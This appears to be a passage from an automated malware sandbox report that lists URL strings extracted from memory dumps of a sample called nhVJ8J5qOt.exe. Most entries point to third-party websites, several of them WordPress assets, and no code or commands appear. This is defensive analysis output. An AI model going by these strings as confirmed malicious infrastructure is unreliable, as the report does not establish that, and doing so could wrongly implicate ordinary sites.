                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/css/dist/block-library/style.min.css?ver=6.0.5
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-includes/wlwmanifest.xml
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-json/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535738967.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535596512.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.530743113.0000000004200000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.581813021.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.627441503.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533336279.0000000004210000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.573333196.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542006080.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539899312.00000000045A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/xmlrpc.php?rsd
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/-
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/M
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/Q
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.00000000015BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vazir.se/v1.0e
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.738728504.0000000001556000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.0000000007689000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vexcom.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vexcom.com/0_
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vexcom.com/;_
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000155D000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.vitaindu.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.000000000158C000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.738728504.000000000158C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.waldi.pl/87
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543963268.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wifi4all.nl/S
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/v1.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wkhk.net/x(C
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.829550341.00000000060FD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.651017417.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.814465034.000000000152E000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641101813.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739131542.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.650670746.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wnsavoy.com/
                  Source: pigalicapi.exe, 00000001.00000003.717340236.0000000003A60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wyjzradio.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000158C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/W
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000015BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/m
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.543802366.000000000158C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.x0c.com/t
                  Source: nhVJ8J5qOt.exe, 00000000.00000002.814465034.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.641393790.0000000001500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.xaicom.es/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.655707909.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654487733.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.658065148.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.654682646.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.533361544.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.661972820.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.655030200.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.662540486.0000000001800000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.xjgc.com
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.527457283.0000000007690000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.739674320.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yocinc.org/
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.527457283.0000000007690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yocinc.org/.?
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739131542.000000000770A000.00000004.00000020.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.832351846.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yocinc.org/I#T
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739131542.000000000770A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yocinc.org/j#)
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.739131542.0000000007721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.yocinc.org/tected_storage
